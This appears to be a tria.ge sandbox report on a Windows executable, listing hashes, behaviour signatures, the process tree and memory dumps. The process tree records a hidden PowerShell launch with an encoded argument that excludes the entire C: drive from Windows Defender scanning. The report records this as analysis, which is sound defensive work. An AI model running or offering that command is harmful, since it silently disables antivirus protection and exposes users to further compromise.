Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    272s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/09/2022, 15:26

General

  • Target

    56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe

  • Size

    2.4MB

  • MD5

    a0b623e5db90e7b7f91a350fcbfd661b

  • SHA1

    12e71a986e8f65a19c7e7a99da8c049c70f533b5

  • SHA256

    56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c

  • SHA512

    c75234cea7a872c7314a895d17ce6ff1a20f28f76631f21ca6f4e9fc8baf39287fe1d6bc0bf0b4005ca25c4816cebb4e91146d074e24308b702e45e78c2c00ca

  • SSDEEP

    49152:7Rozi307t/SoJvnGjQUlJrQu6Kci17kejlkH1og/61H99GoBKxCdMr0B0IaV2aLh:7RoziE7JnGkUTrQfipjlkuH1HbGVxCdI

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
    "C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4288
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2900

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2900-143-0x000002A6D86C0000-0x000002A6D86E2000-memory.dmp

    Filesize

    136KB

  • memory/2900-145-0x00007FF85D400000-0x00007FF85DEC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2900-144-0x00007FF85D400000-0x00007FF85DEC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4288-138-0x0000000003030000-0x00000000030BB000-memory.dmp

    Filesize

    556KB

  • memory/4288-136-0x000000000FEC0000-0x000000001074C000-memory.dmp

    Filesize

    8.5MB

  • memory/4288-137-0x000000000FEC0000-0x000000001074C000-memory.dmp

    Filesize

    8.5MB

  • memory/4288-132-0x000000000289E000-0x0000000003186000-memory.dmp

    Filesize

    8.9MB

  • memory/4288-139-0x0000000003030000-0x00000000030BB000-memory.dmp

    Filesize

    556KB

  • memory/4288-140-0x0000000005D70000-0x0000000005DD6000-memory.dmp

    Filesize

    408KB

  • memory/4288-141-0x000000000FEC0000-0x000000001074C000-memory.dmp

    Filesize

    8.5MB

  • memory/4288-142-0x0000000003190000-0x00000000033C5000-memory.dmp

    Filesize

    2.2MB

  • memory/4288-135-0x0000000003190000-0x00000000033C5000-memory.dmp

    Filesize

    2.2MB

  • memory/4288-134-0x0000000003190000-0x00000000033C5000-memory.dmp

    Filesize

    2.2MB

  • memory/4288-133-0x000000000289E000-0x0000000003186000-memory.dmp

    Filesize

    8.9MB